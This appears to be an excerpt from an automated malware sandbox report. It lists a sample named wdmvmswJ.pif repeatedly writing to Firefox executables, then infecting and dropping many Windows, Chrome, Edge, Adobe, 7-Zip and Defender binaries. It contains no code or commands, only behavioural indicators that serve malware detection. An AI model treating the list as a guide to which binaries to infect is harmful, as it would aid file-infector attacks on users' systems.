Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\sppsvc.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Drops PE files

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
